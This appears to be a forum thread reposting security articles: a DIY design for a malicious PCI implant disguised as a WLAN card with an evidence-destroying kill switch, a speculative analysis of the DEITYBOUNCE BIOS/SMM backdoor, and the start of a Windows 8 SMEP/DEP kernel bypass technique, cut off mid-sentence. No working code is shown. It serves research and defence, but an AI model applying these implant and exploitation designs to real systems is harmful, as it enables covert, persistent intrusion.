V363EPC PCI configuration space registers. This way our BULLDOZER design conforms to the PCI specification nicely. At this point we can control the QuickLogic V363EPC PCI configuration space register’s default values. We also have gained the required knowledge to map a PCI expansion ROM chip into the host x86/x64 CPU address space. The thing that’s left to design is the way to store the BULLDOZER configuration. Let’s assume that we design the BULLDOZER configuration in an NVRAM chip. We can connect the NVRAM chip to SMT310Q PCI carrier board via the TIM interface, just like the PCI expansion ROM chip. The process to design the interconnection is similar to what we have done for the PCI expansion ROM chip. Except that we must expose the chip to code running on the host x86/x64 CPU via different aperture, for example by using PCI-to-Local Aperture 1. Now, we know everything we need to implement a BULLDOZER hardware. There is one more thing left though, the “kill switch”, i.e. the hardware to “destroy” evidence, just in case an operation involving BULLDOZER hardware gets botched. Implementing “Kill Switch”: Military-Grade Electronics Speculation It’s a standard procedure to have a kill switch in military electronics. A kill switch is a mechanism that enables you to destroy hardware or software remotely, that renders the hardware or software beyond repair. The destruction must be sufficient to prevent the software or hardware from being analyzed by anyone. There are several reasons to have a kill switch. First, you don’t want an adversary to find evidence to implicate you in the event that an operation fails. Second, you don’t want your adversary to know your highly valued technology. There are other strategic reasons to have a kill switch, but those two suffice to conduct research into implementing a kill switch in BULLDOZER. BULLLDOZER is a hardware that consists of several electronic chips “bounded” together via circuit board. Therefore, what we need to know is the technique to destroy the key chips in a circuit board at moment’s notice. Surely, we turn to physics to solve this problem. From my experience as an overclocker in the past, I know very well that you can physically destroy a chip by inducing electromigration on it. From Wikipedia: Electromigration is the transport of material caused by the gradual movement of the ions in a conductor due to the momentum transfer between conducting electrons and diffusing metal atoms. Electromigration in simple terms means: the breakdown of metal interconnect inside a semiconductor chip due to migration of metal ions that construct the metal interconnect to an unwanted location. To put it simply, electromigration causes the metal interconnect inside the chip to be destroyed, akin to—but different from—corrosion in metal subjected to harsh environment. In many cases, electromigration can cause unwanted short circuits inside the chip. Figure 13 shows an electromigration illustration. As you can see, the copper ion (Cu+) moves in the opposite direction from the electrons. The copper ion is previously a part of the copper interconnect inside the semiconductor chip. The copper ion “migrates” to a different part of the chip due to electromigration. Figure 13 Electromigration. Courtesy: Wikipedia There are many ways to induce electromigration on a semiconductor chip. However, I would focus only on one of them: overvoltage. You can induce electromigration by feeding excess voltage into a chip or into certain parts of a chip. The problem now is designing a circuit to overvoltage only a certain part of a semiconductor chip. Let’s assume that we don’t want to overvoltage the entire chip, because we have previously assumed that BULLDOZER masquerades as a PCI WLAN chip. Therefore, you only want to destroy the part that implements the custom stealthy wireless communication protocol, not the part that implements the WLAN protocol. If the WLAN function was suddenly destroyed, you would raise suspicion on the target. One of the way to create large voltage inside an electronic circuit is by using the so-called “charge pump”. A charge pump is a DC to DC converter that uses capacitors as energy storage elements to create either a higher or lower voltage power source. As far as I know, it’s quite trivial to implement a capacitor in a semiconductor chip. Therefore, using a charge pump to create our required overvoltage source should be achievable. Figure 14 shows one of the charge pump designs. Figure 14 Dickson Charge Pump Design with MOSFETs. Courtesy: Wikipedia Vin in Figure 14 is the source voltage that’s going to be “multiplied”. Vo in Figure 14 is the output voltage, i.e. a multiplication of the input voltage. As you can see, we can create voltage several times higher than the source voltage inside a semiconductor chip by using a charge pump. I have used a charge pump in one of my projects in the past. It’s made of discrete electronics parts. The output voltage is usually not an exact multiple of the input voltage due to losses in the “multiplier” circuit. I suspect that a charge pump design implemented inside a semiconductor chip provides better “voltage multiplication” function compared to discrete ones. At this point, we have all the things needed to create a kill switch. Your circuit design only needs to incorporate the charge pump into the design. You can use the control register in an FPGA to feed the logic on whether to activate the charge pump or not. You can devise certain byte patterns to turn on the charge pump to destroy your prized malicious logic parts in the PCI add-in card. There are surely many ways to implement a kill switch. Using a charge pump is only one of the many. I present it here merely out of my “intuition” to solve the problem of creating a kill switch. The military surely has more tricks up their sleeve. BULLDOZER Implementation Recap We have gathered all the techniques needed to build a “BULLDOZER-equivalent” hardware in the previous sections. Surely, this is based on our earlier assumption that BULLDOZER masquerades as a PCI WLAN add-in card. Now, let’s compose a recap, building on those newly acquired techniques and our assumptions in the beginning of this article. The recap is as follows: BULLDOZER is a malicious PCI add-in card that masquerades as a PCI WLAN card. It implements the correct PCI class code to masquerade as a PCI WLAN card. BULLDOZER implements a PCI expansion ROM because it’s the delivery mechanism to “inject” GINSU malware code into the x86/x64 host system. BULLDOZER uses SDR to implement a stealthy wireless communication protocol to communicate with OMNIGAT. BULLDOZER was designed by using SDR FPGA prototyping tools before being fabricated as ASIC in the NSA’s semiconductor fab. The NSA could use either Altera, Xilinx or internally-developed FPGA prototyping tools. BULLDOZER exposes the PCI expansion ROM chip via the XROMBAR in its PCI configuration space. The size of PCI expansion ROM chip exposed through XROMBAR is limited to 16MB, per the PCI specification. However, one can devise “custom” code to download additional content from the BULLDOZER PCI add-in card to system RAM as needed during the PCI expansion ROM execution. 16MB is already a large space for malicious firmware-level code though. It’s not yet clear whether one desktop PC implanted with BULLDOZER is enough or more is required to make it work. However, the GINSU extended concept of operation implies that one BULLDOZER-implanted desktop PC is enough. A possibility not covered in this article is the NSA licensed design for the non-stealthy PCI WLAN controller chip part of BULLDOZER from commercial vendors such as Broadcom or Ralink. This could shorten the BULLDOZER design and implementation timeframe by quite a lot. Another possibility not covered here is BULLDOZER PCI chip being a multifunctioning PCI chip. The PCI bus protocol supports a single physical PCI controller chip that contains multiple functions. We don’t delve into that possibility here though. As for the chip marking for the BULLDOZER PCI WLAN controller chip, it could easily carried out by the NSA fab. Well, with the right tool, anyone can even print the “I Love You” phrase as a legitimate-looking chip marking, like the one shown in Andrew “Bunnie” Huang blog: Qué romántico! « bunnie's blog. That is all for our BULLDOZER implementation recap. It’s quite a long journey, but we now have a clearer picture on BULLDOZER hardware implementation. Closing Thoughts: BULLDOZER Evolution Given that BULLDOZER was fielded almost six years ago, the present day BULLDOZER cranking out of the NSA’s fab must have evolved. Perhaps into a PCI Express add-in card. It’s quite trivial to migrate the BULLDOZER design explained in this article into PCI Express (PCIe) though. Therefore, the NSA shouldn’t have any difficulty to carry out the protocol conversion. PCIe is compatible to PCI in the logical level of the protocol. Therefore, most of the non-physical design can be carried over from the PCI version of BULLDOZER design explained here. We should look into the “evolved” BULLDOZER in the future. By Darmawan Salihun|February 14th, 2014 Sursa: NSA Backdoor Part 2, BULLDOZER: And, Learn How to DIY a NSA Hardware Implant - InfoSec Institute
  7. NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE This article is the first part of a series on NSA BIOS backdoor internals. Before we begin, I’d like to point out why these malwares are classified as “god mode.” First, most of the malware uses an internal (NSA) codename in the realms of “gods,” such as DEITYBOUNCE, GODSURGE, etc. Second, these malwares have capabilities similar to “god mode” cheats in video games, which make the player using it close to being invincible. This is the case with this type of malware because it is very hard to detect and remove, even with the most sophisticated anti-malware tools, during its possible deployment timeframe. This part of the series focuses on the DEITYBOUNCE malware described in the NSA ANT Server document, leaked by Edward Snowden. The analysis presented in this article is based on technical implications of the information provided by the document. The document lacks many technical specifics, but based on the BIOS technology at the day DEITYBOUNCE started to become operational, we can infer some technically sound hypotheses—or conclusions, if you prefer . Introduction to DEITYBOUNCE Malware DEITYBOUNCE operates as part of the system shown in Figure 1. Figure 1 shows several peculiar terms, such as ROC, SNEAKERNET, etc. Some of these terms are internally used by NSA. ROC is an abbreviation for remote operation center. ROC acts as NSA’s point of control of the target system; it’s located outside NSA’s headquarter. SNEAKERNET is a fabulous term for physical delivery of data, i.e., using humans to move data between computers by moving removable media such as magnetic tape, floppy disks, compact discs, USB flash drives (thumb drives, USB stick), or external hard drives from one computer to another. Figure 1 DEITYBOUNCE Extended Concept of Operation Figure 1 shows DEITYBOUNCE targeting the machines marked with red dot. DEITYBOUNCE itself is not installed on those machines because DEITYBOUNCE targets Dell PowerEdge 1850/2850/1950/2950 RAID server series with BIOS versions A02, A05, A06, 1.1.0, 1.2.0, or 1.3.7, not laptops or desktop/workstations. This means DEITYBOUNCE is installed in servers accessed by the laptops or desktop/workstations marked with red dots. The red dot also means that the target systems could act as “jump hosts” to implant DEITYBOUNCE in the target servers. Figure 1 also shows the presence of ARKSTREAM. ARKSTREAM is basically a malware dropper which contains BIOS flasher and malware dropper functions. ARKSTREAM can install DEITYBOUNCE on the target server either via exploits controlled remotely (network infection) or via USB thumb drive infection. This infection method, in a way, is very similar to the STUXNET malware dropper. ARKSTREAM installs DEITYBOUNCE via BIOS flashing, i.e., replacing the PowerEdge server BIOS with the one that is “infected” by DEITYBOUNCE malware. The NSA ANT server document doesn’t divulge minute details explaining DEITYBOUNCE’s “technical context” of operation. However, we can infer some parts of the “technical context” from the DEITYBOUNCE technical requirements mentioned in the document. These are the important technical details revealed by the NSA ANT server document: DEITYBOUNCE provides software application persistence on Dell PowerEdge servers by exploiting the motherboard BIOS and utilizing system management mode (SMM) to gain periodic executions while the operating system (OS) loads. DEITYBOUNCE supports multiprocessor systems with RAID hardware and Microsoft Windows 2000, XP, and 2003 Server. Once implanted, DEITYBOUNCE’s frequency of execution (dropping the payload) is configurable and will occur when the target machine powers on. In later sections, we will look into DEITYBOUNCE malware architecture in more detail, based on these technical details. These details provide a lot more valuable hints than you think . But before that, you need to have some important background knowledge. A Closer Look at Dell Power-Edge Hardware Let’s start with the first item of background knowledge. In the previous section, we learned that DEITYBOUNCE targets Dell PowerEdge 1850/2850/1950/2950 RAID server series. Therefore, we need to look into the servers more closely to understand the DEITYBOUNCE execution environment. One can download the relevant server specifications from these links: Dell PowerEdge 1950 specification: http://www.dell.com/downloads/global/products/pedge/en/1950_specs.pdf Dell PowerEdge 2950 specification: http://www.dell.com/downloads/global/products/pedge/en/2950_specs.pdf The server specifications are rather ordinary. However, if you look more closely at the storage options of both server types, you’ll notice the option to use a RAID controller in both server types. The RAID controller is of the type PERC 5/i, PERC4e/DC, or PERC 5/e. We focus on the RAID controller hardware because DEITYBOUNCE technical details mentioned the presence of RAID as one of its hardware “requirements.” Now let’s move into more detailed analysis. You can download the user guide for the Dell PERC family of RAID controller from: ftp://ftp.dell.com/Manuals/Common/dell-perc-4-dc_User’s%20Guide_en-us.pdf. Despite the fact that the document is only a user guide, it provides important information, as follows: PERC stands for PowerEdge Expandable RAID Controller. This means the PERC series of RAID controller are either white-labeled by Dell or developed internally by Dell. There are several types of PERC RAID controllers. The ones with the XX/i moniker are the integrated versions, the XX/SC moniker means that the RAID controller is single channel, the XX/DC moniker means that the RAID controller is dual channel, and the XXe/XX moniker signifies that the RAID controller uses PCI Express (PCIe) instead of PCI bus. If the last moniker is missing, it implies that the RAID controller uses PCI, not PCIe. All PERC variants have 1MB of onboard flash ROM. Mind you, this is not the PowerEdge server motherboard flash ROM but the PERC RAID controller (exclusive) flash ROM. It’s used to initialize and configure the RAID controller. All PERC variants have NVRAM to store their configuration data. The NVRAM is located in the PERC adapter board, except when the PERC is integrated into the motherboard. The PERC RAID controller flash ROM size (1MB) is huge from the firmware code point of view. Therefore, anyone can insert an advanced—read: large in code size—malicious firmware-level module into it. I can’t find information on the Dell PowerEdge 1850/2850/1950/2950 BIOS chip size. However, the size of their compressed BIOS files is larger than 570KB. Therefore, it’s safe to assume that the motherboards BIOS chip size are at least 1MB because, AFAIK, there is no flash ROM chip—used to store BIOS code—that has a size between 570KB and 1MB. The closest flash ROM size to 570KB is 1MB. This fact also present a huge opportunity to place BIOS malware into the motherboard BIOS besides the RAID controller expansion ROM. Initial Program Loader (IPL) Device Primer The second item of background knowledge you need to know pertains to the IPL device. A RAID controller or other storage controller is an attractive victim for firmware malware because they are IPL devices, as per BIOS boot specification. The BIOS boot specification and PCI specification dictate that IPL device firmware must be executed at boot if the IPL device is in use. IPL device firmware is mostly implemented as PCI expansion ROM. Therefore, IPL device firmware is always executed, assuming the IPL device is in use. This fact opens a path for firmware-level malware to reside in the IPL device firmware, particularly if the malware has to be executed at every boot or on certain trigger at boot. For more details on IPL device firmware execution, see: https://sites.google.com/site/pinczakko/low-cost-embedded-x86-teaching-tool-2. You need to take a closer look at the boot connection vector (BCV) in the PCI expansion ROM in that article. The system BIOS calls/jumps-into the BCV during bootstrap to start the bootloader, which then loads and executes the OS. BCV is implemented in the PCI expansion ROM of the storage controller device. Therefore, the PERC RAID controller in Dell PowerEdge servers should implement BCV as well to conform to the BIOS boot specification. IPL device PCI expansion ROM also has a peculiarity. In some BIOS implementations, it’s always executed, whether or not the IPL device is being used. The reason is that the BIOS code very probably only checks for the PCI device subclass code and interface code in its PCI configuration register. See the “PCI PnP Expansion ROM Peculiarity” section at https://sites.google.com/site/pinczakko/low-cost-embedded-x86-teaching-tool-2#pci_pnp_rom_peculiarity. System Management Mode (SMM) Primer The third item of background knowledge needed to understand DEITYBOUNCE is SMM. A seminal work on SMM malware can be found in the Phrack ezine article, A Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers at .:: Phrack Magazine ::.. SMI, in this context, means system management interrupt. The Phrack article contains knowledge required to understand how an SMM rootkit might work. There is one thing that needs to be updated in that Phrack article, though. Recent and present-day CPUs don’t use high segment (HSEG) anymore to store SMM code. Only top-of-memory segment (TSEG) is used for that purpose. If you’re not familiar with HSEG and TSEG, you can refer to System Address Map Initialization in x86/x64 Architecture Part 1: PCI-Based Systems - InfoSec Institute and System Address Map Initialization in x86/x64 Architecture Part 2: PCI Express-Based Systems - InfoSec Institute for details on HSEG and TSEG location in the CPU memory space. This means, for maximum forward compatibility, DEITYBOUNCE very possibly only uses TSEG in its SMM component. Entering SMM via software SMI in x86/x64 is quite simple. All you need to do is write a certain value to a particular I/O port address. A write transaction to this I/O port is interpreted by the chipset as a request to enter SMM, therefore the chipset sends an SMI signal to the CPU to enter SMM. There are certain x86/x64 CPUs that directly “trap” this kind of I/O write transaction and interpret it directly as a request to enter SMM without passing anything to the chipset first. The complete algorithm to enter SMM is as follows: Initialize the DX register with the SMM “activation” port. Usually, the SMM “activation” port is port number 0xB2. However, it could be a different port, depending on the specific CPU and chipset combination. You have to resort to their datasheets for the details. Initialize the AX register with the SMI command value. Enter SMM by writing the AX value to the output port contained in the DX register. As for the methods to pass parameters to the SMI handler routine, it’s not covered extensively by the Phrack article. Therefore, we will have a look the methods here. Some SMM code (SMI handler) needs to communicate with other BIOS modules or with software running inside the OS. The communication mechanism is carried out through parameter passing between the SMM code and code running outside SMM. Parameter(s) passing between the BIOS module and SMI handler in general are carried out using one of these mechanisms: Via the global non-volatile storage (GNVS). GNVS is part of ACPI v4.0 Specification and named ACPI non-volatile storage (NVS) in the ACPI specification. However, in some patent descriptions, NVS stands for non-volatile sleeping memory because the memory region occupied by NVS in RAM stores data that’s preserved even if the system is in sleep mode. Either term refers to the same region in RAM. Therefore, the discrepancies in naming can be ignored. GNVS or ACPI NVS is part of RAM managed by the ACPI subsystem in the BIOS. It stores various data. GNVS is not managed by the OS, but is reachable by the OS through the ACPI source language (ASL) interface. In Windows, parts of this region are accessible through the Windows management instrumentation (WMI) interface. Via general-purpose registers (GPRs) in x86/x64 architecture, i.e., RAX/EAX, RBX/EBX, RDX/EDX, etc. In this technique, a physical address pointer is passed via GPR to the SMI handler code. Because the system state, including the register values, is saved to the “SMM save state,” the code in the SMM area (the SMI handlers) is able to read the pointer value. The catch is: both the SMI handler and the code that passes the parameter(s) must agree on the “calling convention”, i.e., which register(s) to use. Knowing parameter passing between BIOS module and SMI handler is important because DEITYBOUNCE uses this mechanism extensively when it runs. We will look into it in more detail in later sections. Precursor to DEITYBOUNCE Malware Architecture As with other software, we can infer DEITYBOUNCE malware architecture from its execution environment. The NSA ANT server document mentions three technical hints, as you can see in the Introduction section. We’ll delve into them one by one to uncover the possible DEITYBOUNCE architecture. The need for RAID hardware means that DEITYBOUNCE contains a malware implanted in the RAID controller PCI expansion ROM. The RAID controller used in Dell PowerEdge 1950 server is the PERC 5/i, or PERC4e/DC, or PERC 5/e adapter card. All of these RAID controllers are either PCI or PCI Express (PCIe) RAID controllers. You have to pay attention to the fact that PCI expansion ROM also includes PCIe expansion ROM, because both are virtually the same. I have covered PCI expansion ROM malware basics in another article. See Malicious Code Execution in PCI Expansion ROM - InfoSec Institute for the details. The presence of a payload being dropped by DEITYBOUNCE means DEITYBOUNCE is basically a “second-stage” malware dropper—the first stage is the ARKSTREAM malware dropper. DEITYBOUNCE probably only provides these two core functions: The first is as a persistent and stealthy malware modules dropper. The second is to provide a “stealth” control function to other OS-specific malware modules. The malware modules could be running during OS initialization or from inside a running OS or the malware modules can operate in both scenarios. The OS-specific malware communicates with DEITYBOUNCE via SMM calls. The DEITYBOUNCE core functions above imply that there are possibly three kinds of malware components required for DEITYBOUNCE to work as follows: A persistent “infected” PCI expansion ROM. This module contains a routine to configure DEITYBOUNCE’s frequency of execution. The routine possibly stores the configuration in the RAID controller NVRAM. This module also contains the tainted interrupt 13h (Int 13h) handler that can call other routines via SMI to patch the kernel of the currently loading OS. SMI handler(s) code implanted in the PowerEdge motherboard BIOS to serve the software (SW) SMI calls from the “infected” RAID controller PCI expansion ROM. An OS-specific malware payload running in Windows 2000, Windows Server 2003, or Windows XP. At this point we already know the DEITYBOUNCE malware components. This doesn’t imply that we would be able to know the exact architecture of the malware, because there are several possible pathways through which to implement the components. However, I present the most probable architecture here. This is an educated guess. There could be inaccuracies because I don’t have a sample DEITYBOUNCE binary to back up my assertions. But I think the guesses should be close enough, given the nature of x86/x64 firmware architecture. If you could provide a binary sample with suspected DEITYBOUNCE in it, I’m open to analyze it, though . DEITYBOUNCE Malware Architecture We need to make several assumptions before proceeding to the DEITYBOUNCE architecture. This should make it easier to pinpoint the technical details of DEITYBOUNCE. These are the assumptions: The BIOS used by the Dell PowerEdge targets is a legacy BIOS, not EFI/UEFI. This assumption is strengthened by the NSA ANT server document, which mentions the target OS as Windows 2000/XP/2003. None of these operating systems provides mature EFI/UEFI support. All user manuals, including the BIOS setup user manual, don’t indicate any menu related to UEFI/EFI support, such as booting in legacy BIOS mode. Therefore, it’s safe to assume that the BIOS is a legacy BIOS implementation. Moreover, during the launch time of DEITYBOUNCE, EFI/UEFI support in the market is still immature. The custom SMI handler routines required to patch the OS kernel during bootstrap are larger than the empty space available in the motherboard BIOS. Therefore, the routines must be placed into two separate flash ROM storage, i.e., the PERC RAID controller flash ROM chip and the Dell PowerEdge motherboard flash ROM chip. This may be not the case, but let’s just make an assumption here, because even a rudimentary NTFS driver would require at least several tens of kilobytes of space when compressed, not to mention a complicated malware designed to patch kernels of three different operating systems. The assumptions above have several consequences for our alleged DEITYBOUNCE architecture. The first one is that there are two stages in DEITYBOUNCE execution. The second one is that the malware code that patches the target OS kernel during bootstrap (interrupt 19h) is running in SMM. Now let’s look into the DEITYBOUNCE execution stages. DEITYBOUNCE execution stages are as follows: Stage 1—PCI expansion ROM initialization during power-on self-test (POST). In this stage, DEITYBOUNCE installs additional malicious SMI handlers in the system management RAM (SMRAM) range in the RAM on the motherboard. The assumption here is that the SMRAM range is not yet locked by the motherboard BIOS, therefore the SMRAM range is still writeable. SMRAM is a range in system memory (RAM) that is used specifically for SMM code and data. Contents of SMRAM are only accessible through SMI after it has been locked. On most Intel Northbridge chipsets or recent CPUs, SMRAM is controlled by the register that controls the TSEG memory region. Usually, the register is called TSEG_BASE in Intel chipset documentation. Stage 2—Interrupt 13h execution during bootstrap (interrupt 19h). Interrupt 13h handler in the PERC RAID controller PCI expansion ROM is “patched” with malicious code to serve interrupt 19h invocation (bootstrap). Interrupt 19h copies the bootloader to RAM by calling interrupt 13h function 02h, read sectors from drive, and jump into it. DEITYBOUNCE doesn’t compromise the bootloader. However, DEITYBOUNCE compromises the interrupt 13h handler. The “patched” interrupt 13h handler will modify the loaded OS kernel in RAM. Figure 2 shows stage 1 of DEITYBOUNCE execution and Figure 3 shows stage 2 of DEITYBOUNCE execution. Figure 2 DEITYBOUNCE Execution Stage 1 DEITYBOUNCE stage 1 execution, shown in Figure 2, happens during the PCI expansion ROM initialization stage at POST. If you’re not familiar with the detailed steps carried out by the BIOS to initialize an x86/x64 system, a.k.a. power-on self-test, please read my system address map initialization on x86/x64 Part 1 article at System Address Map Initialization in x86/x64 Architecture Part 1: PCI-Based Systems - InfoSec Institute. We know that PCI expansion ROM initialization is initiated by the motherboard BIOS from the Malicious Code Execution in PCI Expansion ROM article (Malicious Code Execution in PCI Expansion ROM - InfoSec Institute). The motherboard BIOS calls the INIT function (offset 03h from start of the PCI expansion ROM) with a far call to start add-on board initialization by the PCI expansion ROM. This event is the stage 1 of DEITYBOUNCE execution. In the DEITYBOUNCE case, the add-on board is the PERC PCI/PCIe board or the PERC chip integrated with the PowerEdge motherboard. Figure 2 illustrates the following execution steps: PERC RAID PCI expansion ROM executes from its INIT entry point. The infected ROM code reads DEITYBOUNCE configuration data from the RAID controller NVRAM. The infected ROM code copies DEITYBOUNCE’s additional SMI handlers to the SMRAM range in the motherboard main memory (system RAM). The infected ROM code fixes checksums of the contents of SMRAM as needed. Once the steps above are finished, the SMRAM contains all of DEITYBOUNCE’s SMI handlers. Figure 2 shows that the SMRAM contains “embedded” DEITYBOUNCE SMI handlers that are already present in SMRAM before the DEITYBOUNCE component in the RAID controller PCI expansion ROM is copied into SMRAM. The embedded DEITYBOUNCE component is injected into the motherboard BIOS. That’s why it’s already present in SMRAM early on. Figure 2 shows DEITYBOUNCE configuration data stored in the PERC add-on board NVRAM. This is an elegant and stealthy way of storing configuration data. How many anti-malware tools scan add-on board NVRAM? I’ve never heard of any. Figure 3 DEITYBOUNCE Execution Stage 2 Now, let’s move to stage 2 of DEITYBOUNCE execution. There are several steps in this execution stage, as follows: The mainboard BIOS executes the PERC RAID controller PCI expansion ROM routine at bootstrap via interrupt 19h (bootstrap). This time the entry point of the PCI expansion ROM is its BCV, not the INIT function. Interrupt 19h invokes interrupt 13h function 02h to read the first sector of the boot device—in this case the HDD controlled by the RAID controller—to RAM and then jump into it to start the bootloader. The infected PCI expansion ROM routine contains a custom interrupt 13h handler. This custom interrupt handler executes when interrupt 13h is called by the bootloader and part of the OS initialization code. The custom routines contain the original interrupt 13h handler logic. But the custom one adds routines to infect the kernel of the OS being loaded. Interrupt 13h provides services to read/write/query the storage device. Therefore, a malicious coder can modify the contents of interrupt 13h handler routine to tamper with the content being loaded to RAM. Figure 3 shows that the custom interrupt 13h handler contains a routine to call the DEITYBOUNCE SMI handler via software SMI. The DEITYBOUNCE SMI handler contains a routine to install malware or to activate certain vulnerabilities in the target OS kernel while the OS is still in the initialization phase. Execution of the custom interrupt 13h handler depends on DEITYBOUNCE configuration data. Figure 3 DEITYBOUNCE configuration data related to the custom interrupt 13h handler is stored in the PERC RAID controller NVRAM. The target OS contains a vulnerability or malware after steps 1 and 2 in DEITYBOUNCE second stage execution. Keep in mind that the vulnerability or malware only exists in RAM because the instance of the OS that’s modified by DEITYBOUNCE exists in RAM, not in a permanent storage device (HDD or SSD). At this point we know how DEITYBOUNCE might work in sufficient detail. However, you should be aware that this is only the result of my preliminary assessment on DEITYBOUNCE. Therefore, it’s bound to have inaccuracies. Closing Thoughts: Hypotheses on DEITYBOUNCE Technical Purpose There are two undeniable strategic values possessed by DEITYBOUNCE compared to “ordinary” malware: DEITYBOUNCE provides a stealthy way to alter the loaded OS without leaving a trace on the storage device, i.e., HDD or SSD, in order to avoid being detected via “ordinary” computer forensic procedures. Why? Because the OS is manipulated when it’s loaded to RAM, the OS installation on the storage device itself is left untouched (genuine). SMM code execution provides a way to conceal the code execution from possible OS integrity checks by other-party scanners. In this respect, we can view DEITYBOUNCE as a very sophisticated malware dropper. DEITYBOUNCE provides a way to preserve the presence of the malware in the target system because it is persistent against OS reinstallation. Given the capabilities provided by DEITYBOUNCE, there could possibly be a stealthy Windows rootkit that communicates with DEITYBOUNCE via software SMI to call the DEITYBOUNCE SMI handler routine at runtime from within Windows. The purpose of such a rootkit is unclear at this point. Whether the required SMI handler is implemented by DEITYBOUNCE is unknown at the moment. By Darmawan Salihun|January 29th, 2014 Sursa: NSA BIOS Backdoor a.k.a. God Mode Malware Part 1: DEITYBOUNCE - InfoSec Institute
  8. Windows 8 Kernel Memory Protections Bypass Recently, MWR intern Jérémy Fetiveau (@__x86) conducted a research project into the kernel protections introduced in Microsoft Windows 8 and newer. This blog post details his findings, and presents a generic technique for exploiting kernel vulnerabilities, bypassing SMEP and DEP. Proof-of-concept code is provided which reliably gains SYSTEM privileges, and requires only a single vulnerability that provides an attacker with a write-what-where primitive. We demonstrate this issue by providing a custom kernel driver, which simulates the presence of such a kernel vulnerability. Introduction Before diving into the details of the bypass technique, we will quickly run through some of the technologies we will be breaking, and what they do. If you want to grab the code and follow along as we go, you can get the zip of the files here. SMEP SMEP (Supervisor Mode Execution Prevention) is a mitigation that aims to prevent the CPU from running code from user-mode while in kernel-mode. SMEP is implemented at the page level, and works by setting flags on a page table entry, marking it as either U (user) or S (supervisor). When accessing this page of memory, the MMU can check this flag to make sure the memory is suitable for use in the current CPU mode. DEP DEP (Data Execution Prevention) operates much the same as it does in user-mode, and is also implemented at the page level by setting flags on a page table entry. The basic principle of DEP is that no page of memory should be both writeable and executable, which aims to prevent the CPU executing instructions provided as data from the user. KASLR KASLR (Kernel Address Space Layout Randomization) is a mitigation that aims to prevent an attacker from successfully predicting the address of a given piece of memory. This is significant, as many exploitation techniques rely on an attacker being able to locate the addresses of important data such as shellcode, function pointers, etc. Paging 101 With the use of virtual memory, the CPU needs a way to translate virtual addresses to physical addresses. There are several paging structures involved in this process. Let’s first consider a toy example where we only have page tables in order to perform the translation. For each running process, the processor will use a different page table. Each entry of this page table will contain the information “virtual page X references physical frame Y”. Of course, these frames are unique, whereas pages are relative to their page table. Thus we can have a process A with a page table PA containing an entry “page 42 references frame 13” and a process B with a page table PB containing an entry “page 42 references frame 37”. If we consider a format for virtual addresses that consists of a page table field followed by an offset referencing a byte within this page, the same address 4210 would correspond to two different physical locations according to which process is currently running (and which page table is currently active). For a 64-bit x86_64 processor, the virtual address translation is roughly the same. However, in practice the processor is not only using page tables, but uses four different structures. In the previous example, we had physical frames referenced by PTEs (page table entries) within PTs (page tables). In the reality, the actual format for virtual addresses looks more like the illustration below: The cr3 register contains the physical address of the PML4. The PML4 field of a virtual address is used to select an entry within this PML4. The selected PML4 entry contains (with a few additional flags) the physical address of a PDPT (Page Directory Pointer Table). The PDPT field of a virtual address therefore references an entry within this PDPT. As expected this PDPT entry contains the physical address of the PD. Again, this entry contains the physical address of a PD. We can therefore use the PD field of the virtual address to reference an entry within the PD and so on and so forth. This is well summarized by Intel’s schema: It should be now be clearer how the hardware actually translates virtual addresses to physical addresses. An interested reader who is not familiar with the inner working of x64 paging can refer to the section 4.5 of the volume 3A of the Intel manuals for more in-depth explanations. Previous Exploitation Techniques In the past, kernel exploits commonly redirected execution to memory allocated in user-land. Due to the presence of SMEP, this is now no longer possible. Therefore, an attacker would have to inject code into the kernel memory, or convince the kernel to allocate memory with attacker-controlled content. This was commonly achieved by allocating executable kernel objects containing attacker controlled data. However, due to DEP, most objects are now non executable (for example, the “NonPagedPoolNx” pool type has replaced “NonPagedPool”). An attacker would now have to find a way to use a kernel payload which uses return-oriented programming (ROP), which re-uses existing executable kernel code. In order to construct such a payload, an attacker would need to know the location of certain “ROP gadgets”, which contain the instructions that will be executed. However, due to the presence of KASLR, these gadgets will be at different addresses on each run of the system, so locating these gadgets would likely require additional vulnerabilities. Technique Overview The presented technique consists of writing a function to deduce the address of paging structures from a given user-land memory address. Once these structures are located, we are able to partially corrupt them to change the metadata, allowing us to “trick” the kernel into thinking a chunk that was originally allocated in user-mode is suitable for use in kernel-mode. We can also corrupt the flags checked by DEP to make the contents of the memory executable. By doing this in a controlled manner, we can created a piece of memory that was initially allocated as not executable by a user-mode process, and modify the relevant paging structures so that it can be executed as kernel-mode code. We will describe this technique in more detail below. Retrieving the Addresses of Paging Structures When the kernel wants to access paging structures, it has to find their virtual addresses. The processor instructions only allow the manipulation of virtual addresses, not physical ones. Therefore, the kernel needs a way to map those paging structures into virtual memory. For that, several operating systems use a special self-referencing PML4 entry. Instead of referencing a PDPT, this PML4 entry will reference the PML4 itself, and shift the other values to make space for the new self-reference field. Thus, instead of referencing a specific byte of memory within a memory page, a PTE will be referenced instead. It is possible to retrieve more structures by using the same self-reference entry several times. A good description of this mechanism can also be found in the excellent book What makes it page? The Windows 7 (x64) virtual memory manager by Enrico Martignetti. A Step-By-Step Example To better understand this process, let’s go through an example showing how to build a function that maps a virtual address to the address of its PTE. First, we should remind ourselves of the usual format of a virtual address. A canonical address has its 48 bits composed of four 9-bit fields and one 12-bit offset field. The PML4 field references an entry within the PML4, the PDPT references an entry within the PDPT, and so on and so forth. If we want to reference a PTE instead of a byte located within a page, we can use the special PML4 entry 0y111101101. We fill the PML4 field with this special entry and then shift everything 9-bits to the right so that we get an address with the following format: We use this technique to build a function which maps the address of a byte of memory to the address of its PTE. If you are following along in the code, this is implemented in the function “getPTfromVA” in the file “computation.cpp”. It should be noted that, even though the last offset field is 12 bits, we still do a 9-bit shift and set the remaining bits to 0 so that we have an aligned address. To get the other structures, we can simply use the same technique several times. Here is an example for the PDE addresses: Modifying Paging Structures We use the term PXE as a generic term for paging structures, as many of them share the same structure, which is as follows: There are a number of fields that are interesting here, especially the NX bit field, which defines how the memory can be accessed, and the flags at the end, which include the U/S flag. This U/S flag denotes whether the memory is for use in user-mode or supervisor-mode (kernel-mode). When checking the rights of a page, the kernel will check every PXE involved in the address translation. That means that if we want to check if the U/S flag is set, we will check all entries relating to that page. If any of the entries do not have the supervisor flag set, any attempt to use this page from kernel mode will trigger a fault. If all of the entries have the supervisor flag set, the page will be considered a kernel-mode page. Because DEP is set at the page granularity level, typically higher level paging structures will be marked as executable, with DEP being applied at the PTE level by setting the NX bit. Because of this, rather than starting by allocating kernel memory, it is easier to allocate user memory with the executable rights using the standard API, and then corrupt 